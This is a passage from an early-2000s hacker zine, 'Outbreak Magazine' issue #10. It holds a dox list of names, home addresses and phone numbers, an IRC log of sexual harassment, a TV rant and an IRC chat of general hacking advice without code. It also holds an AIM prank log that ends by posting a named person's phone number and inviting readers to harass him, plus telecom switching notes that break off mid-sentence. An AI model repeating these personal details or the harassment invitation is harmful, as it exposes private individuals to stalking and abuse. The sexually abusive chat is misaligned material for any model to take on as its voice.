913 Mason St
Schenectady, NY 12308
Jennifer Mills 518-374-0520
907 Mason St
Schenectady, NY 12308
======================
Kyle McNeil
661-513-9809
27807 Crookshank Dr
Santa Clarita, CA 91350
======================
luke traxinger
605-393-0995
======================
Acidchrome
435-647-0838
======================
Nemish
1-847-476-2225
======================
Tom Hagemajer/son_dem0n:
201 E Pershing Ave
Phoenix, AZ 85022
Phone: 602-942-8305
======================
Flanigan, Michael
PRINCETON, WV 24740
304-425-7933
Flanigan, William
204 Forrest St
PRINCETON, WV 24740
304-487-3174
======================
Blaine Lowwer
410-789-8203
======================
enjoy!!
Love
DoxBot
�� ��
�� �� �� ��
��� �� �� �۰����߰� ��� �� �� ����ܰ����۰� ��
�� � �۱� �� �� �������ܱ���߰����� �۰���
�� � �۱� �� �� �� �۱� ��� �����۰� ��
�� ��� ���� ���ܰ������߱� ����߰���۲�� ��
Outbreak Magazine Issue #10 - Article 7 of 18
'~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~'
Session Start: Thu Oct 10 16:20:58 2002
[16:21] <Lexic0n> so you're an emo kid?
[16:21] <emo_kid> what ever could have given you that impression?
[16:21] <Lexic0n> no fucking clue
[16:21] <Lexic0n> i was thinking and thinking
[16:22] <Lexic0n> and i seriously couldn't think of why i wanted to ask you that question
[16:22] <emo_kid> ooh, thinking is never good
[16:22] <Lexic0n> but it just came to me
[16:22] <Lexic0n> kinda like jesus
[16:22] <Lexic0n> does jesus come to you little one?
[16:22] <emo_kid> yes, every day
[16:22] <emo_kid> benji is my jesus *nods*
[16:22] <Lexic0n> benji's good
[16:22] <Lexic0n> he's good
[16:22] <Lexic0n> for shizzle
[16:23] <Lexic0n> what about nancy drew
[16:23] <Lexic0n> you getting enough reading in?
[16:23] * emo_kid shudders at the usage of ebonic-like language
[16:23] <emo_kid> you know it
[16:23] <Lexic0n> hey
[16:23] <Lexic0n> don't diss ebonics
[16:23] <Lexic0n> without it you wouldn't have your stupid emo music
[16:23] <Lexic0n> remember that
[16:23] <emo_kid> *gasp*
[16:23] <emo_kid> i'll ignore that.
[16:24] <emo_kid> quite uncalled for if i do say so myself..
[16:24] <Lexic0n> you really should stop trying to sound so goddamn brilliant
[16:25] <Lexic0n> we all know you're not
[16:25] <emo_kid> ha
[16:25] <Lexic0n> you're just another kid trying to fit in
[16:25] <Lexic0n> so tell me
[16:25] <Lexic0n> do you have a penis or a vagina
[16:25] <emo_kid> fit in where? on irc? riiiight.. i care about what dumbass computer nerds think of me
[16:25] <Lexic0n> apparently you must, after alll
[16:25] <Lexic0n> you are here
[16:25] <Lexic0n> :)
[16:26] <emo_kid> ..and so are you
[16:26] <Lexic0n> i'm always here
[16:26] <Lexic0n> i cry when they hate me
[16:26] <emo_kid> well that's a sad thing to admit, but ok.
[16:26] <Lexic0n> i'm so emo
[16:26] <Lexic0n> penis or vagina
[16:26] <emo_kid> woo.. vagina all the way.
[16:27] <Lexic0n> i was thinking
[16:27] <Lexic0n> maybe i could come over and finger you
[16:27] <Lexic0n> we could make out
[16:27] <Lexic0n> and listen to the promise ring
[16:27] <emo_kid> or.. you know.. you could fuck off
[16:28] <Lexic0n> but i love you
[16:28] <Lexic0n> i want to pass you the box of tissues
[16:28] <Lexic0n> and write you poems
[16:28] <Lexic0n> and kiss your sweet pussy
[16:28] <emo_kid> *blinks* that's alright, you have fun with that stick up your ass, bye bye
[16:28] <Lexic0n> wait
[16:28] <Lexic0n> i love you
[16:28] <Lexic0n> honey
[16:28] <Lexic0n> don't leave me again
[16:28] <Lexic0n> i'm so sick of this
[16:29] <Lexic0n> I'LL GIVE YOU BACK YOUR GET UP KIDS CD
[16:29] <Lexic0n> I SWEAR
[16:29] <emo_kid> if you're going to make fun of the music, why are you in the channel?
[16:29] <Lexic0n> i just wanna make love to you underneath the stars
[16:29] <Lexic0n> fuck the music
[16:30] <Lexic0n> the music means nothing
[16:30] <Lexic0n> i'll burn my guitar
[16:30] <Lexic0n> i love you baby
[16:30] <emo_kid> damn.. someone has issues. shoo, fag, don't bother me.
[16:30] <Lexic0n> i love you
[16:30] <Lexic0n> i just want to caress your sweet tits
[16:30] <Lexic0n> and lick your little pink nipples
[16:30] <Lexic0n> come on
[16:30] <Lexic0n> baby
[16:32] <Lexic0n> baby please don't leave me
[16:35] <Lexic0n> FINE YOU WHORE
[16:35] <Lexic0n> GO WITH ROSCOE
[16:35] <Lexic0n> GO WITH HIM
[16:35] <Lexic0n> I HATE YOU
[16:35] <Lexic0n> I HATE YOU BITCH
[16:36] <emo_kid> roscoe gives me what i need, sorry hon.
[16:36] <Lexic0n> YOU WHORE
[16:36] <Lexic0n> YOU DIRTY ROTTEN WHORE
[16:36] <Lexic0n> you will die
[16:36] <Lexic0n> i will kill myself
[16:36] <emo_kid> that's me
[16:36] <Lexic0n> on your front lawn
[16:36] <emo_kid> can't wait
[16:37] <Lexic0n> you said you loved me
[16:37] <Lexic0n> you said you'd never leave me
[16:37] <Lexic0n> my baby cakes
[16:37] <Lexic0n> why do you lie to me
[16:37] <emo_kid> yea well.. that's what alcohol does to you i suppose.
[16:37] <Lexic0n> stop drinking honey
[16:37] <Lexic0n> come home
[16:38] <emo_kid> nah.. i'll be just fine in the trailor park with roscoe.. he treats me good, unlike you, filthy bastard.
[16:39] <Lexic0n> but with my 9 inch penis can't you look past the fact we have to dumpster dive baby?
[16:39] <Lexic0n> i fucked you so good
[16:39] <Lexic0n> so very good
[16:39] <emo_kid> true..
[16:39] <Lexic0n> and i loved you
[16:39] <emo_kid> alright, to hell with roscoe.
[16:39] <Lexic0n> roscoe just can't do that like me
[16:39] <Lexic0n> i love you baby
[16:39] <Lexic0n> don't leave me again
[16:40] <emo_kid> hm you know, i wasn't trying to act 'so damn brilliant' earlier.. dry humor and sarcasm obviously aren't to your liking
[16:41] <Lexic0n> as long as you don't leave me again baby
[16:41] <Lexic0n> you can sarcasm and dry humor all you want
[16:41] <Lexic0n> i'll take it like you take my 9 inches of hot throbbing man meat
[16:42] <emo_kid> hm and how old are you?
[16:48] <Lexic0n> 18 honey
[16:48] <Lexic0n> you knew that
Session Close: Thu Oct 10 17:37:57 2002
�� ��
�� �� �� ��
��� �� �� �۰����߰� ��� �� �� ����ܰ����۰� ��
�� � �۱� �� �� �������ܱ���߰����� �۰���
�� � �۱� �� �� �� �۱� ��� �����۰� ��
�� ��� ���� ���ܰ������߱� ����߰���۲�� ��
Outbreak Magazine Issue #10 - Article 8 of 18
'~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~'
[curb your enthusiasm]
[by: joja]
[for: outbreak]
For those of you who do not have access to HBO, this small rant really
doesn't matter. Now, we all know that HBO is great to watch most of
your favorite movies, and is one of the(if not THE) best cable channel
on television today. But "HBO Original Programming" is another story.
HBO Original Programming is the fucking bomb diggity! Let's see, we have:
Band of Brothers, a great war series that got amazing ratings, and was
all-around kick ass! Then we have Oz, the prison drama which is filled
with violence, blood, and all that good shit. A real man's show with
many characters some which you may be able to identify with, which makes
it even better.
Six Feet Under, a series about a disfunctional family that runs a funeral
home out of thier house. A great show, somewhat soap opera-like, a lot
of drama which keeps your attention, and pisses you off when the show
is over. I give it two thumbs and an erect penis up!
The Wire. The two-part crime drama. It was simply amazing, I loved it.
You get you taste of life on the streets, drugs, sex and crime. And you
get your taste of the Badass cops fucking shit up. You got to watch it
from both point of views. A definate 3 "thumbs" up.
We all know we can't forget the Sopranos! The Mafia, murder, organized
crime, drugs, conspiracy, and hot chicks!! How can you now love this show?
It's almost to the point where I can't express in words how kick ass it
really is.(Meadow, mmm...)
Ok, here's my rant. My one and only problem with HBO Original Programming.
The 30 minute block of "Curb Your Enthusiasm." This show got ratings such
as "Laughing-out-loud hilarious," and "Maybe the best show ever." I want to
punch whoever rated this show in the head several times. Curb Your Enthusiasm
is
the biggest piece of shit show I've ever watched in my entire life, I say that
with all my heart. You may say "Well, maybe you're missing the humor." No.
I see and get the humor, it just sucks so bad I want to kick my own ass for
not changing the channel.
Now explain to me how a show such as Curb Your Enthusiasim got lined up
with the great shows I mentioned earlier(I forgot RealSex, Shock Video,
and America Undercover; which are also kick ass)? HBO has such a great name
as far as Television is concerned, how could they shit all over us with
Curb Your Enthusiasm? I say the viewers take a vote, a vote to get this puddle
of stagnant babboon urine off my TV Guide.
Overall, Fuck Larry, fuck Curb Your Enthusiasm and Fuck you too HBO, for
having such shitty taste. Yes, It's one bad show out of a lot of great shows.
But give me a break, they stooped too low on this one. I could make a better show
with a camcorder and my family at Christmas time. Curb Your Enthusiasm sucks!
�� ��
�� �� �� ��
��� �� �� �۰����߰� ��� �� �� ����ܰ����۰� ��
�� � �۱� �� �� �������ܱ���߰����� �۰���
�� � �۱� �� �� �� �۱� ��� �����۰� ��
�� ��� ���� ���ܰ������߱� ����߰���۲�� ��
Outbreak Magazine Issue #10 - Article 9 of 18
'~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~'
IRC - Hacking FAQ
=================
2002-10-05
by Timeless
timeless@hackstation.tk
(the n00b's name was changed to save embarrassment - I'll leave it to you
to figure out which one is the n00b, hehehe)
---<begins>---------------------------------------------------------------------
<SomeNewbie> hey
<Timeless> hiya
<SomeNewbie> what does this channel do?
<SomeNewbie> teach?
<Timeless> it holds intelligence, so maybe it could teach I suppose
<SomeNewbie> well i want to learn
<Timeless> you are not the only one, even elite hackers constantly try to
learn more
<SomeNewbie> hehe
<Timeless> today's hack is tomorrow's patch
<SomeNewbie> well im a newbe
<Timeless> you have many years to go
<SomeNewbie> hehe
<SomeNewbie> well we all have to start some were right
<Timeless> yes, but there is pain involved
<SomeNewbie> hehe
<Timeless> do you write programs?
<SomeNewbie> im learning
<Timeless> good, learn more
<Timeless> all languages
<SomeNewbie> i know some c++
<SomeNewbie> and i learned pascal
<SomeNewbie> but thats kindof i useless
<Timeless> learn some assembly
<Timeless> :)
<Timeless> to give you an idea of some real hacking, check out the tutorials
on buffer and stack overflows on this page: www.roothack.org
<Timeless> the links are on the right
<SomeNewbie> i c
<Timeless> there are some nice debugger tips in there too
<SomeNewbie> so this can do it?
<Timeless> it's a start
<Timeless> "it" is never done
<SomeNewbie> hehe tru
<SomeNewbie> what will this site teach?
<Timeless> it will hopefully help you to understand good coding practices
<SomeNewbie> kool
<Timeless> by knowing the flaws you can write good strong code
<SomeNewbie> do i apply for the game?
<Timeless> heh, the game is way too advanced
<Timeless> don't bother with the game yet
<SomeNewbie> o lol
<Timeless> do you run Linux?
<SomeNewbie> ok ill just read up on it then
<Timeless> k
<SomeNewbie> i run a xp
<SomeNewbie> adn a mac
<Timeless> Jaguar?
<SomeNewbie> yup
<Timeless> kewl
<Timeless> under the hood is like BSD
<Timeless> a type of Unix
<Timeless> get your hands dirty
<SomeNewbie> hehe
<Timeless> also get a spare box up and try running RedHat Linux
<Timeless> setup firewalls, web servers, etc.
<SomeNewbie> i tried that 1ce
<Timeless> kewl
<Timeless> try it more
<SomeNewbie> i dont like it much
<SomeNewbie> i couldnt even get on the internet
<SomeNewbie> hehe
<Timeless> the more you expose yourself to this kind of stuff the more likely
you are to get an instinct for it
<Timeless> make some dynamic web sites, try see the related security issues
<SomeNewbie> ok
<SomeNewbie> ill check it out
<Timeless> examine the various network protocols
<Timeless> get a feel for what is going on behind the scenes
<SomeNewbie> right
<Timeless> see how quickly that got like really big?!
<Timeless> lots to do
<SomeNewbie> ya lol
<Timeless> hope you're young
<Timeless> :)
<SomeNewbie> hehe
<Timeless> ... it will take half your life to become a well-rounded elite
hacker/cracker etc.
<SomeNewbie> wow
<SomeNewbie> i thought u just learn it
<SomeNewbie> like reading a book
<SomeNewbie> lolol
<Timeless> um, no, unfortunately
<Timeless> hehe
<Timeless> I wish
<SomeNewbie> ya
<Timeless> considering many things change
<SomeNewbie> that would be nice
<Timeless> at a rapid rate
<SomeNewbie> tru
<Timeless> which is why the instinct thing is important
<Timeless> what's your profession?
<SomeNewbie> im in school
<Timeless> ok
<Timeless> anyone else you know that likes the same kind of thing? (hacking)
<SomeNewbie> not really
<Timeless> yeah, me neither
<SomeNewbie> hehe
<SomeNewbie> what kind of stuff can u do ?
<SomeNewbie> like hacking
<Timeless> I'm too far gone now, people I know wouldn't understand even the
simplest of things I have to talk about
<SomeNewbie> lol
<Timeless> well, I've done all kinds of things
<SomeNewbie> how long did it take u to learn?
<Timeless> I am a professional programmer and I worked for an ISP
<Timeless> started in 1985
<SomeNewbie> damn
<SomeNewbie> been around for a while
<Timeless> yep
<SomeNewbie> what do u think about LINdows
<Timeless> not checked it out yet
<Timeless> what do you think of it?
<SomeNewbie> heard ne thing interesting?
<SomeNewbie> havent tried it either
<Timeless> I have heard the odd thing that assures me it exists
<SomeNewbie> i c
<SomeNewbie> it supposedly can run linux and windows progrmas?
<Timeless> other Linuxes run Windows apps using "wine"
<Timeless> wine stands for: Wine Is Not an Emulator
<Timeless> hehe
<Timeless> although, you can run something like bochs if you want to emulate
another PC on your current PC
<Timeless> bochs can be found on Sourceforge
<SomeNewbie> hmm
<SomeNewbie> i need to learn to use linux to hakc?
<Timeless> you need to expose yourself to many OS'es
<Timeless> a lot of serious web hosting companies use RedHat Linux
<SomeNewbie> what os u use?
<Timeless> heh, I have XP as workstation, RH Linux as firewall/gateway, my
other boxes have Debian Linux and Windows 2000
<SomeNewbie> Debian
<SomeNewbie> whats that?
<Timeless> I can also configure Cisco routers
<Timeless> Debian is yet another Linux distro
<SomeNewbie> damn
<SomeNewbie> im taking a cisco class
<Timeless> good
<Timeless> I don't get to use Solaris much these days
<Timeless> I can't be arsed to buy the hardware
<Timeless> am saving up for my first Mac (well, first one for home use anyway)
<SomeNewbie> ya
<SomeNewbie> i love my mac
<SomeNewbie> it can do so much crap
<Timeless> and one day I want to continue playing around with MPLCs
<Timeless> and I want a mini-PC
<Timeless> hehe
<SomeNewbie> i got me a dell laptop
<Timeless> me too
<SomeNewbie> and a dual 1.4 gig g4
<Timeless> it's a bit old tho
<Timeless> I like the G4, can't afford one tho
<SomeNewbie> mine about 1 year
<SomeNewbie> 1ghz
<SomeNewbie> ya i had to save for 2 years
<Timeless> well done dude
<Timeless> impressive
<SomeNewbie> hehe
<Timeless> one more thing, and this is just me I'm speaking for... I make
of rule of never hacking out in the wild.
<SomeNewbie> meaning?
<Timeless> meaning I won't go hacking for fun
<SomeNewbie> then y else would u hack?
<Timeless> unless the company pays me to do it to themselves
<Timeless> and I have a written contract
<SomeNewbie> well,,,
<SomeNewbie> lol
<Timeless> I hack my own computers to learn
<SomeNewbie> LOL
<Timeless> I have no motive to hack anyone
<SomeNewbie> nicely put
<Timeless> ... yet :)
<SomeNewbie> hehe
<SomeNewbie> let see......
<Timeless> lol
<SomeNewbie> could u get into my computer right now?
<Timeless> dunno
<Timeless> maybe
<SomeNewbie> it will prob be extremy easy
<SomeNewbie> hehe
<Timeless> :)
<Timeless> there was a competition/honey pot running recently, XP Home box,
default install connected to the net
<Timeless> I don't think it was broken into
<Timeless> it's when the user starts doing stupid things that makes it easier
<SomeNewbie> hehe
<Timeless> or if services are open to buffer overflows etc.
<SomeNewbie> kool
<Timeless> a buffer overflow is basically a way of getting some pre-prepared
code of mine to run on your machine, which would in turn download a back
door program for me to have a more advanced interaction with your computer
<SomeNewbie> thats awsome
<Timeless> some buffer overflows can take ages to create once you find a
flaw in the software that can be abused
<SomeNewbie> thats y u need to be a programer
<Timeless> it's sometimes easier to send you a trojan, or get you to view
a web site that exploits other known flaws in your web browser for
example
<Timeless> yes, exactly!
<Timeless> being a programmer makes sure that you understand what you are
doing
<SomeNewbie> thats pretty awsome
<Timeless> having worked at an ISP, I also understand how traceable you are
too :)
<SomeNewbie> so before i try to start ne thing i should learn more programming
<Timeless> yes
<SomeNewbie> what isp u work for?
<Timeless> I used to work for www.********.co.zw - Zimbabwe's leading ISP,
but then I moved to the UK
<SomeNewbie> u lived in Zimbabwe?
<Timeless> I used to catch hackers in the act, then make them aware I knew
what they were doing, scare them a bit, then befriend them - they never
attempted to hack my servers again after that
<Timeless> it was great
<SomeNewbie> hehe
<SomeNewbie> sounds awsome
<Timeless> having an understanding of web servers and buffer overflows helped
me prevent my web servers from being vulnerable to the code red worm -
simply use an application-level firewall, like SecureIIS for example on
the web server
<Timeless> I also write web applications
<Timeless> so understanding the HTTP protocol and anything web-related also
helps a lot
<SomeNewbie> damn
<SomeNewbie> u know everything
<Timeless> no way!
<Timeless> I don't
<Timeless> I found the more I learn the less I feel I know
<Timeless> there is just too much to learn
<Timeless> eventually you find you will specialise in various areas of the
art that you like
<SomeNewbie> tru
<Timeless> I used to crack software - ie. remove 30-day expiry etc. for fun
(never to distribute on the net though - bearing in mind my first rule)
<SomeNewbie> kool'
<Timeless> but that gets a bit boring
<Timeless> so I stopped doing it
<SomeNewbie> ya?
<Timeless> besides, all my software is properly paid for now
<SomeNewbie> hehe
<SomeNewbie> so what do u do int this channel?>
<Timeless> I chat if anyone wants to chat, give and take advice, etc., most
people idle here
<Timeless> everyone likes to stereotype hackers - I'm just curious, and like
computers, but I am also a very responsible person
---<ends>-----------------------------------------------------------------------
�� ��
�� �� �� ��
��� �� �� �۰����߰� ��� �� �� ����ܰ����۰� ��
�� � �۱� �� �� �������ܱ���߰����� �۰���
�� � �۱� �� �� �� �۱� ��� �����۰� ��
�� ��� ���� ���ܰ������߱� ����߰���۲�� ��
Outbreak Magazine Issue #10 - Article 10 of 18
'~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~'
Specialized Common Carrier Service (SCCS)
contibuted by Adeamis
The DMS-250 Specialized Common Carrier Service (SCCS) provides the capability
of Analog to Digital (A/D) and Digital to Analog (D/A) conversions which are
necessary with analog circuits. The DMS-250 can also switch voice and data
circuits.
The DMS-250 takes either analog or digitally encoded info and by using time
slot interchange, switches it from any input port to a temporary addressed and
connected exit port. The info may or may not be converted back to analog.
Cellular Mobile Radio Service
A cellular system consists of two main parts: a cellular switch and cell site
equipment.
Cellular Switching Systems
A cellular switch performs three main functions: audio switching, cell site
control, and system administration.
The DMS switches provide three basic implementations for cellular switching:
Stand-alone, Combined, and Remote.
Stand-alone switching is done by a Mobile Telephone Exchange (MTX) which is
interfaced with one or more class 5 end offices. The connection is made by
DID/DOD trunks. Depending on the needs of the area, the MTX can be divided as
follows: MTX which serves urban areas, MTXC which handles suburban areas, and
MTXM which is used for rural areas.
Combined switching is incorporated into a DMS-100 by some hardware additions
and cellular software. Combined switching is designed to give an easy,
cost-effective way to install cellular services to an existing host.
Remote Switching is done by combining Remote Switching Center (RSC) with a
Cell Site Controller (CSC). This combination is hosted by either a
stand-alone or a combined switch. Remote Switching is designed for serving
suburban centers, remote areas, or a small community and it gives extra
flexibility for a growing system.
All of these cellular switches have the ability to balance the workload among
various cell sites. For example, if one site's workload reaches the
programmable level of congestion, calls would be routed to nearby sites that
can handle the extra calls.
Cell Site Equipment
Cell site equipment consists of a CSC and radio equipment. The CSC is
controlled by the cellular switch and it controls radio equipment and
maintenance tasks. The CSC will work on any MTX cellular switch because of
the Remote Cluster Controller (RCC).
The radio equipment consists of self-contained Radio Channel Units (RCU),
antennas, transmitter multi-couplers, and receiver combiners.
By different program software, an RCU can perform voice, control locating, and
test functions. The self contained nature allows the RCU be remotely located
to the CSC. A RCU has built-in circuitry for extended testing of the radio
part of the system.
Cellular switching i didnt write it
�� ��
�� �� �� ��
��� �� �� �۰����߰� ��� �� �� ����ܰ����۰� ��
�� � �۱� �� �� �������ܱ���߰����� �۰���
�� � �۱� �� �� �� �۱� ��� �����۰� ��
�� ��� ���� ���ܰ������߱� ����߰���۲�� ��
Outbreak Magazine Issue #10 - Article 11 of 18
'~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~'
Pac Man Ninja
=============
by: kleptic <kleptic@grex.org>
http://www.kleptic.tk
AIM - kl3ptic
=============
kl3ptic: Blaine.. my man.
kl3ptic: whats going down?
KoNkReTeEleMeNt: who is this
kl3ptic: Nick you silly bastard
kl3ptic: heh
kl3ptic: whats up?
KoNkReTeEleMeNt: well then why did u im me on the other name
kl3ptic: cause im an elite ninja.. why else?
kl3ptic: dont be a dipshit blaine.
kl3ptic: say
kl3ptic: we getting together this weekend?
kl3ptic: to party like a mother fucker?
KoNkReTeEleMeNt: who is this
kl3ptic: i just told you .. did you get your head beat in as a 4 year old?
kl3ptic: its fucking Nick
kl3ptic: mullet and all dude
KoNkReTeEleMeNt: nick who
kl3ptic: what do you mean nick who?
kl3ptic: quit being a dick
kl3ptic: hey, i got pac man arcade classic dude
kl3ptic: you in?
kl3ptic: its the shit
kl3ptic: not that fucking mrs. pac man bull
kl3ptic: all out PAC MAN
kl3ptic: you down with this shit?
KoNkReTeEleMeNt: nick that hangs out with andrew
kl3ptic: c'mon Blaine.. don't be a pansy ass.
kl3ptic: Pac Man Blaine
kl3ptic: Pac to the mother fucking Man
KoNkReTeEleMeNt: u quit fucking with me yo
KoNkReTeEleMeNt: who to the mother fuck is this
kl3ptic: DUDE. I'm not fucking with you..
kl3ptic: Are you scared of my pac man ninja skills Blaine?
kl3ptic: You think you can take me in Pac Man?
kl3ptic: Oh OH! I think not my friend!
KoNkReTeEleMeNt: dude get a life
kl3ptic: hey dude. If you're scared. That's cool.
kl3ptic: I mean, i would be scared too.. if i had to take on the fucking PAC MAN NINJA!
kl3ptic: damn straight
KoNkReTeEleMeNt: oh oh im not scared
kl3ptic: right ;-)
kl3ptic: you're pissing your little cammo panties
kl3ptic: c'mon blaine.. lets pac man this shit up
kl3ptic: lets do this old school
KoNkReTeEleMeNt: yo fuck u kid
kl3ptic: like willy from the wizard!
kl3ptic: yeah!
kl3ptic: hey man. you a little scared?
kl3ptic: little yellow stripe down your pac man wussy back?
kl3ptic: thats cool
kl3ptic: Fear my Pac Man ninja skills
kl3ptic: cause when those Ghosts come up
kl3ptic: i fucking chomp those bitches
kl3ptic: left and right
kl3ptic: fear
KoNkReTeEleMeNt: ok then tell me the last name
kl3ptic: lowwer or how ever you spell it
kl3ptic: bizatch
KoNkReTeEleMeNt: no urs bitch
kl3ptic: You don't need my name. You just address me as "Pac Man Ninja"
kl3ptic: oh yes.
kl3ptic: I'll Ninja spike your ass back to pac man land bizatch!
kl3ptic: make you shit your little cammo panties
KoNkReTeEleMeNt: yo if this is brian ill strait fuck u up bitch
kl3ptic: brian?
kl3ptic: this is Nick you little Mrs. Pac Man pansy
KoNkReTeEleMeNt: yo who ever it is dont let me cacth ur bitch ass
kl3ptic: you wont be able to.
kl3ptic: cause im a freaking ninja
kl3ptic: pac man style
kl3ptic: just when you think you're alone.. . BAM.. ninja spike to the back of the skull
kl3ptic: drop kick your nuts.. make you piss your camo panties
KoNkReTeEleMeNt: ok peace u want to talk some shit here is my number call me now bitch 789 8203
kl3ptic: i already got it
kl3ptic: and i will call ;-)
==============================================================
Some kid wanted me to harass him.. so I did.. here's his info
if you want to harass him:
Blaine Lowwer
410-789-8203
More of my logs can be found on my site: http://www.kleptic.tk
==============================================================
�� ��
�� �� �� ��
��� �� �� �۰����߰� ��� �� �� ����ܰ����۰� ��
�� � �۱� �� �� �������ܱ���߰����� �۰���
�� � �۱� �� �� �� �۱� ��� �����۰� ��
�� ��� ���� ���ܰ������߱� ����߰���۲�� ��
Outbreak Magazine Issue #10 - Article 12 of 18
'~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~'
Digital Multiplexing System
By Adeamis
Dms was made by the northern telecom in 1979
and can be interfaced with the listed switches
1.ESS 1-4
2.Xbar
3.TSPS
4.EAX
The dms was made to be small to have room for other installations
LCM line concentrating module
MDF main distribution frame
DMS are in the Class5 Switching
DMS 100 integrates voice and data in a total business communications system and up to 30,000 lines
DMS-10 for up to 10,800 lines mostly connected with big brother dms 100 or 200 switch
DMS 200 access's 60,000 trunks also serve a AT access tandem function can also control controls Operater-assisted calls
DMS 250 not often used
The Phukin Functions
Call Waiting Lamp
Loop Keys - There are 6 loop keys, each with its associated source and
destination lamp to indicate the calling and called party states.
Alphanumeric Display
Multiple Directory Numbers
Feature Keys - Up to a total of 42. Some of them could be used for Speed
Calling and Paging System.
Incoming Call Identifier
Exclude Source/Exclude Destination - privacy keys
Signal Source/Signal Destination: Release Source/Release Destination
Console
Access to paging
Call hold
Call detail entry Remote console
Call Selection Console display
Camp-on Automatic recall
Conference - 6 port Two-way splitting
Non-delayed operation Attendant transfer
Locked loop operation Busy verification of lines
Manual and automatic hold Multiple console operation
Busy verification of trunks Switched loop operation
Trunk g
roup busy indication Uniform call distribution form queue
Multiple listed directory numbers Control of trunk group access
Secrecy Night service
Serial call Speed calling
Lockout Delayed operation
Position busy Interposition calling
Through dialing
Dms allows BUSINESS's to have
LCD
Indicators
Call Forwarding
Automatic Line
Call Pick-up
Ring Again - automatically redials busy numbers until they are free
Multiple Directory Numbers
Intercom
Speed Call
Call Transfer/Conference
On-Hook Dialing
Programmable Functions
Automatic Hold
Listen-on Hold
Multiple Appearance Directory Numbers (MADN)
Single Call Arrangement
Multiple Call Arrangement
Privacy Release
Tone Ringing with Volume Control
End-to-End Signaling
Call Park
Make Set Busy
Malicious
Call Trace
Busy Override
Attendant Recall
Call Waiting
Stored Number Redial
Private Business Line
32 Character Alphanumeric Display
wich as you can see most of that shit they use everywhere so dms are very popuLAR
DMS is remote switching with a bunch of remote modules in a bunch of
sizes and capabilities including SXS replacement or growth and Office feature's.
The use of remote modules give the CO more floor space that would usually be used by the Line Concentrating Modules
Trunk Module
(TM) The Trunk Module - changes incoming speech into digital format, it has the
ability to handle 30 analog trunks. The Pulse Code Modulation (PCM)
information is combined with the trunks supervisory and control signals then
transmitted at 2.56 Mb/s over speech links to the network not just with landlines.
The TM also uses service circuits such as Multifrequency (MF) receivers,
announcement trunks, and test circuits. Each TM has the ability to interface
30 analog trunks or service circuits to the network over one 32-channel speech
link. The TM is not traffic sensitive so each trunk can carry 36 CCS.
Digital Carrier Module
The Digital Carrier Module (DCM) is a digital interface between the DMS
switch and the DS-1 digital carrier.
The DS-1 signal consists of 24 voice channels.
The DCM takes out and puts in signaling and control information on
the DS-1 bit streams which then makes them DS-30 32-channel speech links. The
DCM can interface five DS-1 lines; 5*24=120 voice channels; into four 32-
channel speech links. The DCM can carry a maximum of 36 CCS of traffic on
each trunk.
Line Module
The Line Module (LM) gives an interface for a maximum of 640 analog lines and
condenses the voice and signaling into two, three, or four DS-30, 32-channel
speech links. Four speech links have the ability to handle 3,700 Average Busy
Season Busy Hour (ABSBH) CCS per LM.
Operator Features
With the use of DMS-200 or DMS 100/200 switch, operator features are available
by the following:
Traffic Operator Position System (TOPS)
Operator Centralization (OC)
Auxiliary Operator Service System (AOSS)
Traffic Operator Position System (TOPS) gives many operator function on inward
and outward calls. The TOPS integrates the operator system with the DMS-200
or DMS-100/200 toll switch.
One voice and one data circuit are needed for each operator position. The
voice circuit is connected to a port of a three-port conference circuit. The
other two ports are connected to the calling and called parties. The data
circuit is used for a digital modem and is used to transmit data punched in by
the operator to the CCC for processing.
Operator Centralization
Operator Centralization (OC) lets the operator use the services given by the
DMS-200 or DMS-100/200 with TOPS. With OC operator traffic from surrounding
DMS sites can be routed to a central host site.
Operator Centralization Diagram
Routing - - -
<-----\ DMS-200 | AMA |
\ Remote TC / - - -
= = = = = = = /
| \ ----- ___|_/
| \: DMS : |
| : 200 : | Host TC -----
| : : | = = = = = = = = /| POS |
| : (OC:___| | --------- | / |- - -|
| : : |\ | : DMS-200 : | / |Oper.|
| -----\ | \ | : (TOPS) :__|_/ -----
= = = = = = = \____________|__: : |
Trib Ope Traffic->\ ____________|__:OC) : |
\ / | : : |
Non-DMS Remote TC / | --------- |
= = = = = = = = = = = = = = = = = = =
| -------- ----- |
| : TDM : : (OC: |
| : Switch : : : | -----
| : : : DMS :_|_____: AMA :
| : : : 200 : | -----
| /-------- -----\ |
= = = = = = = = = = =
/Routing \ <-Trib Opr Traffic
\-------> \
Equal Access
Equal Access (EA) is accessible through DMS switches with the addition of
software packages. Both Equal Access End Office (EAEO) for the DMS-100 and
Access Tandem (AT) for the DMS-200 provide equal access features.
Equal Access Network Application
--------- __________________________________
(Phone)--------| DMS-100 |___________ |
--------- | |
NON-EAEO | |IC/INC
-------- -------- /---------\ TO
(Phone)---| |------------| DMS-200 |------------ ---- IC/INC
-------- --------- \---------/ /----->
| |
--------- ___________| |
(Phone)--------| DMS-100 |__________________________________|
---------
DMS-100 EAEO
The DMS-100 EAEO gives direct access to interLATA (Local Access and Transport
Area) carriers Point of Presence (POP) inside the LATA. The DMS-200 AT gives
a traffic concentration and distribution function for interLATA traffic
originating or terminating inside a LATA. It allows the following:
10XXX and 950-1XXX dialing
presubscription dialing
equal access and normal network control signaling
Automatic Number Identification (ANI) on all calls
custom calling services
Common Channel Interoffice Signaling No. 6
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
The basis for the CCIS system is the International Consultative Committee on
Telephone and Telegraph (CCITT) No. 6 international standard, which is brought
to its fullest capacity for use in the Stored Program Control (SPC) network of
AT&T.
The CCIS6 network contains a bunch of signaling regions, each having a pair of
interconnected Signal Transfer Points (STP). The switching systems put into
CCIS6 that connect to STPs are called Serving Offices (SO).
Band Signaling (CCIS-BS) is used on trunk signaling for intertoll-type trunks
using the CCIS network.
Direct Signaling (CCIS-DS) is used for signaling between SPC switching
machines and a Network Control Point (NCP). At the present time, CCIS6 can
handle Enhanced INWATS Originating Screening Office (OSO), Calling Card
Validation (CCV), Mechanized Calling Card Service (MCCS), and Billed Number
Screening (BNS). CCIS6 is available with DMS-100/200, DMS-200, and
